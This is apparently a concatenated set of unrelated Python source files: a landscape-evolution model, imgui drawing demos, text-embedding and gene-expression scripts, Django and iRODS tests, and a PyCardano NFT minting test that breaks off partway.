ny, nx = self.shape
dy, dx = self.spacing
fs.slope(self.elevation.ravel(), slope.ravel(), nx, ny, dx, dy)
return slope
@curvature.compute
def _curvature(self):
curv = np.empty_like(self.elevation)
ny, nx = self.shape
dy, dx = self.spacing
fs.curvature(self.elevation.ravel(), curv.ravel(), nx, ny, dx, dy)
return curv
@xs.process
class StratigraphicHorizons:
"""Generate a fixed number of stratigraphic horizons.
A horizon is active, i.e., it tracks the evolution of the
land/submarine topographic surface until it is "frozen" at a given
time. Beyond this freezing (or deactivation) time, the horizon
will only be affected by tectonic deformation and/or erosion.
To compute diagnostics on those horizons, you can create a
subclass where you can add "on_demand" variables.
"""
freeze_time = xs.variable(
dims='horizon',
description='horizon freezing (deactivation) time',
static=True
)
horizon = xs.index(dims='horizon', description='horizon number')
active = xs.variable(
dims='horizon',
intent='out',
description='whether the horizon is active or not'
)
surf_elevation = xs.foreign(SurfaceTopography, 'elevation')
elevation_motion = xs.foreign(TotalVerticalMotion, 'surface_upward')
bedrock_motion = xs.foreign(TotalVerticalMotion, 'bedrock_upward')
elevation = xs.variable(
dims=('horizon', 'y', 'x'),
intent='out',
description='elevation of horizon surfaces'
)
@xs.runtime(args='sim_start')
def initialize(self, start_time):
if np.any(self.freeze_time < start_time):
raise ValueError("'freeze_time' value must be greater than the "
"time of the beginning of the simulation")
self.elevation = np.repeat(self.surf_elevation[None, :, :],
self.freeze_time.size,
axis=0)
self.horizon = np.arange(0, len(self.freeze_time))
self.active = np.full_like(self.freeze_time, True, dtype=bool)
@xs.runtime(args='step_start')
def run_step(self, current_time):
self.active = current_time < self.freeze_time
def finalize_step(self):
elevation_next = self.surf_elevation + self.elevation_motion
self.elevation[self.active] = elevation_next
self.elevation[~self.active] = np.minimum(
self.elevation[~self.active] + self.bedrock_motion,
elevation_next
)
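def _example_model():
    # A minimal sketch (not part of the original module) of how these process
    # classes might be assembled into an xsimlab model. The dictionary keys are
    # illustrative names, and this assumes the listed processes form a
    # self-consistent set of dependencies.
    return xs.Model({
        'grid': UniformRectilinearGrid2D,
        'vertical_motion': TotalVerticalMotion,
        'topography': SurfaceTopography,
        'bedrock': Bedrock,
        'sediment': UniformSedimentLayer,
        'terrain': TerrainDerivatives,
    })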
|
105397
|
import arcade
import imgui
import imgui.core
from imdemo.page import Page
class Rect(Page):
def draw(self):
imgui.begin("Rectangle")
draw_list = imgui.get_window_draw_list()
p1 = self.rel(20, 35)
p2 = self.rel(90, 80)
draw_list.add_rect(*p1, *p2, imgui.get_color_u32_rgba(1,1,0,1), thickness=3)
p1 = self.rel(110, 35)
p2 = self.rel(180, 80)
draw_list.add_rect(*p1, *p2, imgui.get_color_u32_rgba(1,0,0,1), rounding=5, thickness=3)
imgui.end()
class RectFilled(Page):
def draw(self):
imgui.begin("Rectangle Filled")
draw_list = imgui.get_window_draw_list()
p1 = self.rel(20, 35)
p2 = self.rel(90, 80)
draw_list.add_rect_filled(*p1, *p2, imgui.get_color_u32_rgba(1,1,0,1))
p1 = self.rel(110, 35)
p2 = self.rel(180, 80)
draw_list.add_rect_filled(*p1, *p2, imgui.get_color_u32_rgba(1,0,0,1), 5)
imgui.end()
def install(app):
app.add_page(Rect, "rect", "Rectangle")
app.add_page(RectFilled, "rectfilled", "Rectangle Filled")
|
105399
|
import tomotopy as tp
model = tp.DTModel()
print(model.alpha)
# print(model.eta)
print(model.lr_a)
print(model.lr_b)
print(model.lr_c)
print(model.num_timepoints)
print(model.num_docs_by_timepoint)
model.add_doc(["new", "document"], timepoint=0)
|
105406
|
import argparse
from agutil import status_bar
import subprocess
import csv
import shutil
from qtl.annotation import Annotation
import tempfile
def run(args):
print("Parsing GTF")
gtf = Annotation(args.gtf.name)
print("Parsing GCT")
numRows = int(subprocess.check_output("wc -l %s" % args.gct.name, shell=True).decode().strip().split()[0]) - 3
header = ''.join([next(args.gct), next(args.gct)])
reader = csv.DictReader(args.gct, delimiter='\t')
w = tempfile.NamedTemporaryFile('w')
w.write(header)
writer = csv.DictWriter(w, reader.fieldnames, delimiter='\t', lineterminator='\n')
writer.writeheader()
current = None
features = []
for line in status_bar.iter(reader, maximum=numRows):
gene = '_'.join(line['Name'].split('_')[:-1])
if gene != current:
if current is not None:
ref = gtf.get_gene(current)
try:
if len(ref):
ref = ref[0]
except:
pass
exons = {exon.id:exon for transcript in ref.transcripts for exon in transcript.exons}
raw_size = len(exons)
for exon in [exon for exon in exons]:
try:
if exon.isdigit() and int(exon) <= raw_size:
exons[current+'_'+exon] = exons[exon]
except:
pass
features.sort(
key=lambda feat:(
1 if exons[feat['Name']].length == 1 else 0,
exons[feat['Name']].start_pos,
exons[feat['Name']].end_pos
)
)
for i in range(len(features)):
parts = features[i]['Name'].split('_')
prefix = '_'.join(parts[:-1])
suffix = parts[-1]
if exons[features[i]['Name']].length == 1:
features[i][reader.fieldnames[-1]] = 0
suffix = str(i)
features[i]['Name'] = prefix+'_'+suffix
writer.writerows(features)
current = gene
features = []
features.append({k:v for k,v in line.items()})
if len(features):
ref = gtf.get_gene(current)
try:
if len(ref):
ref = ref[0]
except:
pass
exons = {exon.id:exon for transcript in ref.transcripts for exon in transcript.exons}
raw_size = len(exons)
for exon in [exon for exon in exons]:
try:
if exon.isdigit() and int(exon) <= raw_size:
exons[current+'_'+exon] = exons[exon]
except:
pass
features.sort(
key=lambda feat:(
1 if exons[feat['Name']].length == 1 else 0,
exons[feat['Name']].start_pos,
exons[feat['Name']].end_pos
)
)
for i in range(len(features)):
prefix, suffix = features[i]['Name'].split('_')
if exons[features[i]['Name']].length == 1:
features[i]['Counts'] = 0
suffix = str(i)
features[i]['Name'] = prefix+'_'+suffix
writer.writerows(features)
print("Cleaning up")
w.flush()
args.gct.close()
shutil.copyfile(
args.gct.name,
args.gct.name+'.bak'
)
shutil.copyfile(
w.name,
args.gct.name
)
def main():
parser = argparse.ArgumentParser('flipper')
parser.add_argument(
'gct',
type=argparse.FileType('r'),
help="RNA-SeQC 2 Exon reads gct file"
)
parser.add_argument(
'gtf',
type=argparse.FileType('r'),
help="Reference GTF for the exons"
)
args = parser.parse_args()
run(args)
if __name__ == '__main__':
main()
|
105466
|
import os
import subprocess
import argparse
import torch
import json
# import h5py
import gzip, csv
import numpy as np
from tqdm import tqdm
from torch.nn.utils.rnn import pad_sequence
from transformers import *
def get_sentence_features(batches, tokenizer, model, device, maxlen=500):
features = tokenizer.batch_encode_plus(batches, padding=True,
return_attention_mask=True, return_token_type_ids=True,
truncation=True, max_length=maxlen)
attention_mask = torch.tensor(features['attention_mask'], device=device)
input_ids = torch.tensor(features['input_ids'], device=device)
token_type_ids=torch.tensor(features['token_type_ids'], device=device)
# (batch, seq_len, nfeature)
token_embeddings = model(input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids)[0]
# mean of embeddings as sentence embeddings
embeddings = (attention_mask.unsqueeze(-1) * token_embeddings).sum(1) / attention_mask.sum(1).unsqueeze(-1)
return embeddings
def hdf5_create_dataset(group, input_file, fp16=False):
global tokenizer, model, device
print(f'precompute embeddings for {input_file}')
pbar = tqdm()
with open(input_file, 'r') as fin:
batches = []
cur = 0
for i, line in enumerate(fin):
batches.append(line.strip())
if (i+1) % batch_size == 0:
with torch.no_grad():
embeddings = get_sentence_features(batches, tokenizer, model, device)
for j, embed in enumerate(embeddings):
embed = embed.cpu().numpy()
if fp16:
embed = embed.astype('float16')
group.create_dataset(f'{cur}', embed.shape,
dtype='float32' if not fp16 else 'float16', data=embed)
cur += 1
pbar.update(len(batches))
batches = []
if len(batches) > 0:
with torch.no_grad():
embeddings = get_sentence_features(batches, tokenizer, model, device)
for j, embed in enumerate(embeddings):
embed = embed.cpu().numpy()
if fp16:
embed = embed.astype('float16')
group.create_dataset(f'{cur}', embed.shape,
dtype='float32' if not fp16 else 'float16', data=embed)
cur += 1
def jsonl_create_dataset(output_file, input_file, fp16=False):
global tokenizer, model, device
print(f'precompute embeddings for {input_file}')
pbar = tqdm()
fout = open(output_file, 'w')
with open(input_file, 'r') as fin:
batches = []
cur = 0
for i, line in enumerate(fin):
batches.append(line.strip())
if (i+1) % batch_size == 0:
with torch.no_grad():
embeddings = get_sentence_features(batches, tokenizer, model, device)
for j, embed in enumerate(embeddings):
embed = embed.cpu().numpy()
if fp16:
embed = embed.astype('float16')
fout.write(json.dumps({cur: embed.tolist()}))
fout.write('\n')
cur += 1
pbar.update(len(batches))
batches = []
if len(batches) > 0:
with torch.no_grad():
embeddings = get_sentence_features(batches, tokenizer, model, device)
for j, embed in enumerate(embeddings):
embed = embed.cpu().numpy()
if fp16:
embed = embed.astype('float16')
fout.write(json.dumps({cur: embed.tolist()}))
fout.write('\n')
cur += 1
fout.close()
def csv_create_dataset(output_file, input_file, fp16=False):
global tokenizer, model, device
print(f'precompute embeddings for {input_file}')
pbar = tqdm()
fout = gzip.open(output_file, 'wt')
# fout = open(output_file, 'w')
fieldnames = ['embedding']
writer = csv.DictWriter(fout, fieldnames=fieldnames)
writer.writeheader()
with open(input_file, 'r') as fin:
batches = []
cur = 0
for i, line in enumerate(fin):
batches.append(line.strip())
if (i+1) % batch_size == 0:
with torch.no_grad():
embeddings = get_sentence_features(batches, tokenizer, model, device)
for j, embed in enumerate(embeddings):
embed = embed.cpu().numpy()
if fp16:
embed = embed.astype('float16')
writer.writerow({'embedding': embed.tolist()})
cur += 1
pbar.update(len(batches))
batches = []
if len(batches) > 0:
with torch.no_grad():
embeddings = get_sentence_features(batches, tokenizer, model, device)
for j, embed in enumerate(embeddings):
embed = embed.cpu().numpy()
if fp16:
embed = embed.astype('float16')
writer.writerow({'embedding': embed.tolist()})
cur += 1
fout.close()
def np_create_dataset(output_file, input_file, fp16=False):
global tokenizer, model, device
print(f'precompute embeddings for {input_file}')
pbar = tqdm()
# fout = open(output_file, 'w')
proc = subprocess.run(['wc', '-l', input_file], capture_output=True)
dstore_size = int(proc.stdout.decode('utf-8').split()[0])
dtype = 'float16' if fp16 else 'float32'
print(f'{dstore_size} examples')
dstore = np.memmap(output_file,
dtype=dtype,
mode='w+',
shape=(dstore_size, model.config.hidden_size),
)
with open(input_file, 'r') as fin:
batches = []
cur = 0
for i, line in enumerate(fin):
batches.append(line.strip())
if (i+1) % batch_size == 0:
with torch.no_grad():
embeddings = get_sentence_features(batches, tokenizer, model, device)
dstore[cur:cur+embeddings.size(0)] = embeddings.cpu().numpy().astype(dtype)
cur += embeddings.size(0)
assert model.config.hidden_size == embeddings.size(1)
pbar.update(len(batches))
batches = []
if len(batches) > 0:
with torch.no_grad():
embeddings = get_sentence_features(batches, tokenizer, model, device)
dstore[cur:cur+embeddings.size(0)] = embeddings.cpu().numpy().astype(dtype)
cur += embeddings.size(0)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='pre-compute the Bert embeddings')
    parser.add_argument('dataset', type=str, help='name of the dataset (a directory under datasets/)')
parser.add_argument('--split', type=str, default=None,
help='if specified, only compute for this split')
parser.add_argument('--fp32', action='store_true', default=False,
                        help='use full 32-bit float precision (half precision is used by default)')
parser.add_argument('--sent-bert', action='store_true', default=False,
help='whether to use sentence-BERT')
args = parser.parse_args()
args.cuda = torch.cuda.is_available()
save_dir = f"precompute_embedding_datasets/{args.dataset}"
os.makedirs(save_dir, exist_ok=True)
device = "cuda" if args.cuda else "cpu"
model_name = 'bert-base-uncased' if not args.sent_bert else 'sentence-transformers/bert-base-nli-mean-tokens'
model_short = 'bert' if not args.sent_bert else 'sentbert'
model = AutoModel.from_pretrained(model_name)
tokenizer = AutoTokenizer.from_pretrained(model_name)
model.to(device)
model.eval()
gname_list = [args.split] if args.split is not None else ['valid', 'test', 'template', 'train']
batch_size = 128
for gname in gname_list:
if os.path.isfile(f'datasets/{args.dataset}/{gname}.txt'):
np_create_dataset(os.path.join(save_dir, f'{args.dataset}.{model_short}.{gname}.npy'),
os.path.join(f'datasets/{args.dataset}/{gname}.txt'), not args.fp32)
# for gname in gname_list:
# if os.path.isfile(f'datasets/{args.dataset}/{gname}.txt'):
# csv_create_dataset(os.path.join(save_dir, f'{args.dataset}.{model_short}.{gname}.csv.gz'),
# os.path.join(f'datasets/{args.dataset}/{gname}.txt'), args.fp16)
# for gname in gname_list:
# if os.path.isfile(f'datasets/{args.dataset}/{gname}.txt'):
# with h5py.File(os.path.join(save_dir, f'{args.dataset}.{model_short}.{gname}.hdf5'), 'w') as fout:
# hdf5_create_dataset(fout, os.path.join(f'datasets/{args.dataset}/{gname}.txt'))
|
105478
|
from __future__ import print_function
import sys
import shutil
import os
if sys.version_info >= (2, 7):
import unittest
else:
import unittest2 as unittest
import os
import datetime
import socket
from .. import test
from . import settings
from .. import lib
from . import resource_suite
from ..configuration import IrodsConfig
class Test_ClientHints(resource_suite.ResourceBase, unittest.TestCase):
def setUp(self):
super(Test_ClientHints, self).setUp()
def tearDown(self):
super(Test_ClientHints, self).tearDown()
def test_client_hints(self):
self.admin.assert_icommand('iclienthints', 'STDOUT_SINGLELINE', 'plugins')
|
105485
|
import datetime
from test_plus.test import TestCase
from qa_tool.tests.helpers import RelevancyScoreBuilder, AlgorithmBuilder, SearchLocationBuilder
from rest_framework import status
from rest_framework.authtoken.models import Token
from rest_framework.test import APIClient
from human_services.services_at_location.tests.helpers import ServiceAtLocationBuilder
from newcomers_guide.tests.helpers import create_topic
from common.testhelpers.random_test_values import an_integer, a_string
class GETRelevancyScoreTests(TestCase):
def setUp(self):
self.user = self.make_user()
self.token = Token.objects.create(user=self.user)
self.APIClient = APIClient()
self.data = {
'value': an_integer(),
'algorithm': AlgorithmBuilder().create().id,
'search_location': SearchLocationBuilder().create().id,
'service_at_location': ServiceAtLocationBuilder().create().id,
'topic': create_topic(a_string()).id,
}
def test_can_get_one_entity_unauthenticated(self):
score_value = an_integer()
score = RelevancyScoreBuilder(self.user).with_value(score_value).create()
url = '/qa/v1/relevancyscores/{0}/'.format(score.pk)
response = self.APIClient.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json()['value'], score_value)
def test_can_get_entities_unauthenticated(self):
RelevancyScoreBuilder(self.user).create()
RelevancyScoreBuilder(self.user).create()
url = '/qa/v1/relevancyscores/'
response = self.APIClient.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.json()), 2)
def test_cannot_get_non_existent_entity_unauthenticated(self):
url = '/qa/v1/relevancyscores/0/'
response = self.APIClient.get(url)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
class DELETERelevancyScoreTests(TestCase):
def setUp(self):
self.user = self.make_user()
self.token = Token.objects.create(user=self.user)
self.APIClient = APIClient()
self.data = {
'value': an_integer(),
'algorithm': AlgorithmBuilder().create().id,
'search_location': SearchLocationBuilder().create().id,
'service_at_location': ServiceAtLocationBuilder().create().id,
'topic': create_topic(a_string()).id,
}
def test_can_delete(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
score = RelevancyScoreBuilder(self.user).create()
url = '/qa/v1/relevancyscores/{0}/'.format(score.pk)
response = self.APIClient.delete(url)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_cannot_delete_unauthenticated(self):
score = RelevancyScoreBuilder(self.user).create()
url = '/qa/v1/relevancyscores/{0}/'.format(score.pk)
response = self.APIClient.delete(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_cannot_delete_non_existent_entity(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
url = '/qa/v1/relevancyscores/0/'
response = self.APIClient.delete(url)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
class PUTRelevancyScoreTests(TestCase):
def setUp(self):
self.user = self.make_user()
self.new_user = self.make_user(username='testuser2')
self.token = Token.objects.create(user=self.user)
self.APIClient = APIClient()
self.sample_score = RelevancyScoreBuilder(self.user).create()
self.data = {
'value': an_integer(),
'algorithm': AlgorithmBuilder().create().id,
'search_location': SearchLocationBuilder().create().id,
'service_at_location': ServiceAtLocationBuilder().create().id,
'topic': create_topic(a_string()).id,
}
def test_can_put_value(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
new_value = an_integer()
self.data['value'] = new_value
url = '/qa/v1/relevancyscores/{0}/'.format(self.sample_score.pk)
response = self.APIClient.put(url, self.data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json()['value'], new_value)
def test_can_put_algorithm(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
new_algorithm = AlgorithmBuilder().create()
self.data['algorithm'] = new_algorithm.id
url = '/qa/v1/relevancyscores/{0}/'.format(self.sample_score.pk)
response = self.APIClient.put(url, self.data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json()['algorithm'], new_algorithm.id)
def test_can_put_search_location(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
new_search_location = SearchLocationBuilder().create()
self.data['search_location'] = new_search_location.id
url = '/qa/v1/relevancyscores/{0}/'.format(self.sample_score.pk)
response = self.APIClient.put(url, self.data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json()['search_location'], new_search_location.id)
def test_can_put_service_at_location(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
new_service_at_location = ServiceAtLocationBuilder().create()
self.data['service_at_location'] = new_service_at_location.id
url = '/qa/v1/relevancyscores/{0}/'.format(self.sample_score.pk)
response = self.APIClient.put(url, self.data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json()['service_at_location'], new_service_at_location.id)
def test_can_put_topic(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
new_topic = create_topic(a_string())
self.data['topic'] = new_topic.id
url = '/qa/v1/relevancyscores/{0}/'.format(self.sample_score.pk)
response = self.APIClient.put(url, self.data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json()['topic'], new_topic.id)
def test_put_response_has_new_time_stamp(self):
url = '/qa/v1/relevancyscores/{0}/'.format(self.sample_score.pk)
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
response = self.APIClient.put(url, self.data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
recreated_time = datetime.datetime.strptime(response.json()['time_stamp'], '%Y-%m-%dT%H:%M:%S.%fZ')
self.assertLessEqual(recreated_time, datetime.datetime.now())
self.assertGreaterEqual(recreated_time + datetime.timedelta(seconds=1), datetime.datetime.now())
def test_can_put_with_different_credential(self):
new_token = Token.objects.create(user=self.new_user)
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + new_token.key)
new_value = an_integer()
self.data['value'] = new_value
url = '/qa/v1/relevancyscores/{0}/'.format(self.sample_score.pk)
response = self.APIClient.put(url, self.data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json()['user'], self.new_user.id)
self.assertEqual(response.json()['value'], new_value)
def test_cannot_put_id(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
new_id = an_integer()
self.data['id'] = new_id
url = '/qa/v1/relevancyscores/{0}/'.format(self.sample_score.pk)
response = self.APIClient.put(url, self.data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.json(), 'id of relevancyscore is immutable')
def test_cannot_put_user(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
self.data['user'] = self.new_user.id
url = '/qa/v1/relevancyscores/{0}/'.format(self.sample_score.pk)
response = self.APIClient.put(url, self.data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.json(), 'user_id of relevancyscore is immutable')
def test_cannot_put_unauthenticated(self):
url = '/qa/v1/relevancyscores/{0}/'.format(self.sample_score.pk)
self.data['value'] = an_integer()
response = self.APIClient.put(url, self.data)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_cannot_put_non_existent_entity(self):
url = '/qa/v1/relevancyscores/0/'
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
response = self.APIClient.put(url, self.data)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
class POSTRelevancyScoreTests(TestCase):
def setUp(self):
self.user = self.make_user()
self.token = Token.objects.create(user=self.user)
self.APIClient = APIClient()
self.score_value = an_integer()
self.data_without_algorithm_in_body = {
'value': self.score_value,
'search_location': SearchLocationBuilder().create().id,
'service_at_location': ServiceAtLocationBuilder().create().id,
'topic': create_topic('test').id,
}
self.data_with_algorithm_in_body = {
'value': self.score_value,
'algorithm': AlgorithmBuilder().create().id,
'search_location': SearchLocationBuilder().create().id,
'service_at_location': ServiceAtLocationBuilder().create().id,
'topic': create_topic(a_string()).id,
}
def test_can_post_with_algorithm_in_body_not_in_url_short_url(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
url = '/qa/v1/relevancyscores/'
response = self.APIClient.post(url, data=self.data_with_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.json()['value'], self.score_value)
def test_can_post_with_algorithm_in_url_not_in_body_long_url(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
algorithm = AlgorithmBuilder().create()
url = '/qa/v1/algorithms/{0}/relevancyscores/'.format(algorithm.pk)
response = self.APIClient.post(url, data=self.data_without_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.json()['value'], self.score_value)
def test_post_response_has_correct_algorithm(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
url = '/qa/v1/relevancyscores/'
response = self.APIClient.post(url, self.data_with_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.json()['algorithm'], self.data_with_algorithm_in_body['algorithm'])
def test_post_response_has_correct_search_location(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
url = '/qa/v1/relevancyscores/'
response = self.APIClient.post(url, self.data_with_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.json()['search_location'], self.data_with_algorithm_in_body['search_location'])
def test_post_response_has_correct_service_at_location(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
url = '/qa/v1/relevancyscores/'
response = self.APIClient.post(url, self.data_with_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.json()['service_at_location'],
self.data_with_algorithm_in_body['service_at_location'])
def test_post_response_has_correct_topic(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
url = '/qa/v1/relevancyscores/'
response = self.APIClient.post(url, self.data_with_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.json()['topic'], self.data_with_algorithm_in_body['topic'])
def test_post_response_has_correct_user(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
url = '/qa/v1/relevancyscores/'
response = self.APIClient.post(url, self.data_with_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.json()['user'], self.user.id)
def test_post_response_has_accurate_time_stamp(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
url = '/qa/v1/relevancyscores/'
response = self.APIClient.post(url, self.data_with_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
recreated_time = datetime.datetime.strptime(response.json()['time_stamp'], '%Y-%m-%dT%H:%M:%S.%fZ')
self.assertLessEqual(recreated_time, datetime.datetime.now())
self.assertGreaterEqual(recreated_time + datetime.timedelta(seconds=1), datetime.datetime.now())
def test_cannot_post_unauthenticated(self):
url = '/qa/v1/relevancyscores/'
response = self.APIClient.post(url, data=self.data_with_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_cannot_post_with_invalid_algorithm_in_url_valid_algorithm_in_body_long_url(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
url = '/qa/v1/algorithms/0/relevancyscores/'
response = self.APIClient.post(url, data=self.data_with_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_cannot_post_without_algorithm_in_body_or_url_short_url(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
url = '/qa/v1/relevancyscores/'
response = self.APIClient.post(url, data=self.data_without_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_cannot_post_with_invalid_algorithm_in_url_missing_algorithm_in_body_long_url(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
url = '/qa/v1/algorithms/0/relevancyscores/'
response = self.APIClient.post(url, data=self.data_without_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_cannot_post_with_algorithm_in_body_and_url_short_url(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
algorithm_id = self.data_with_algorithm_in_body['algorithm']
url = '/qa/v1/relevancyscores/{0}/'.format(algorithm_id)
response = self.APIClient.post(url, data=self.data_with_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_cannot_post_with_algorithm_in_body_and_url_long_url(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
algorithm_id = self.data_with_algorithm_in_body['algorithm']
url = '/qa/v1/algorithms/{0}/relevancyscores/'.format(algorithm_id)
response = self.APIClient.post(url, data=self.data_with_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_cannot_post_with_algorithm_in_url_not_in_body_short_url(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
algorithm_id = AlgorithmBuilder().create().id
url = '/qa/v1/relevancyscores/{0}/'.format(algorithm_id)
response = self.APIClient.post(url, data=self.data_without_algorithm_in_body)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_cannot_post_when_missing_fields(self):
self.APIClient.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)
bad_data = {
'value': an_integer(),
'algorithm': AlgorithmBuilder().create().id,
# 'search_location': missing search_location
'service_at_location': ServiceAtLocationBuilder().create().id,
'topic': create_topic(a_string()).id,
}
url = '/qa/v1/relevancyscores/'
response = self.APIClient.post(url, bad_data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
|
105506
|
import pathlib
import tempfile
import cbor2
from retry import retry
from pycardano import *
from .base import TestBase
class TestMint(TestBase):
@retry(tries=4, delay=6, backoff=2, jitter=(1, 3))
def test_mint(self):
address = Address(self.payment_vkey.hash(), network=self.NETWORK)
# Load payment keys or create them if they don't exist
def load_or_create_key_pair(base_dir, base_name):
skey_path = base_dir / f"{base_name}.skey"
vkey_path = base_dir / f"{base_name}.vkey"
if skey_path.exists():
skey = PaymentSigningKey.load(str(skey_path))
vkey = PaymentVerificationKey.from_signing_key(skey)
else:
key_pair = PaymentKeyPair.generate()
key_pair.signing_key.save(str(skey_path))
key_pair.verification_key.save(str(vkey_path))
skey = key_pair.signing_key
vkey = key_pair.verification_key
return skey, vkey
tempdir = tempfile.TemporaryDirectory()
PROJECT_ROOT = tempdir.name
root = pathlib.Path(PROJECT_ROOT)
# Create the directory if it doesn't exist
root.mkdir(parents=True, exist_ok=True)
"""Generate keys"""
key_dir = root / "keys"
key_dir.mkdir(exist_ok=True)
# Generate policy keys, which will be used when minting NFT
policy_skey, policy_vkey = load_or_create_key_pair(key_dir, "policy")
"""Create policy"""
# A policy that requires a signature from the policy key we generated above
pub_key_policy_1 = ScriptPubkey(policy_vkey.hash())
# A policy that requires a signature from the extended payment key
pub_key_policy_2 = ScriptPubkey(self.extended_payment_vkey.hash())
# A time policy that disallows token minting after 10000 seconds from last block
must_before_slot = InvalidHereAfter(self.chain_context.last_block_slot + 10000)
# Combine two policies using ScriptAll policy
policy = ScriptAll([pub_key_policy_1, pub_key_policy_2, must_before_slot])
# Calculate policy ID, which is the hash of the policy
policy_id = policy.hash()
"""Define NFT"""
my_nft = MultiAsset.from_primitive(
{
policy_id.payload: {
b"MY_NFT_1": 1, # Name of our NFT1 # Quantity of this NFT
b"MY_NFT_2": 1, # Name of our NFT2 # Quantity of this NFT
}
}
)
native_scripts = [policy]
"""Create metadata"""
        # We need to create metadata for our NFTs so they can be displayed correctly by blockchain explorers
metadata = {
721: { # 721 refers to the metadata label registered for NFT standard here:
# https://github.com/cardano-foundation/CIPs/blob/master/CIP-0010/registry.json#L14-L17
policy_id.payload.hex(): {
"MY_NFT_1": {
"description": "This is my first NFT thanks to PyCardano",
"name": "PyCardano NFT example token 1",
"id": 1,
"image": "ipfs://QmRhTTbUrPYEw3mJGGhQqQST9k86v1DPBiTTWJGKDJsVFw",
},
"MY_NFT_2": {
"description": "This is my second NFT thanks to PyCardano",
"name": "PyCardano NFT example token 2",
"id": 2,
"image": "ipfs://QmRhTTbUrPYEw3mJGGhQqQST9k86v1DPBiTTWJGKDJsVFw",
},
}
}
}
# Place metadata in AuxiliaryData, the format acceptable by a transaction.
auxiliary_data = AuxiliaryData(AlonzoMetadata(metadata=Metadata(metadata)))
"""Build transaction"""
# Create a transaction builder
builder = TransactionBuilder(self.chain_context)
# Add our own address as the input address
builder.add_input_address(address)
# Since an InvalidHereAfter rule is included in the policy, we must specify time to live (ttl) for this transaction
builder.ttl = must_before_slot.after
# Set nft we want to mint
builder.mint = my_nft
# Set native script
builder.native_scripts = native_scripts
# Set transaction metadata
builder.auxiliary_data = auxiliary_data
